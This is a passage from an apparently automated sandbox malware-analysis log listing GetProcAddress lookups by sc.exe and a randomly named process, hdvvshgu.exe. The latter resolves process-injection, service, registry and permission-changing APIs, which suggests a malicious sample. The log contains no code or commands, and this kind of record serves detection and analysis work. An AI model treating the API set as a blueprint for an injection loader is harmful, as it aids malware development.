LpkTabbedTextOut (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005332)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005808)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005676)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005676)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW 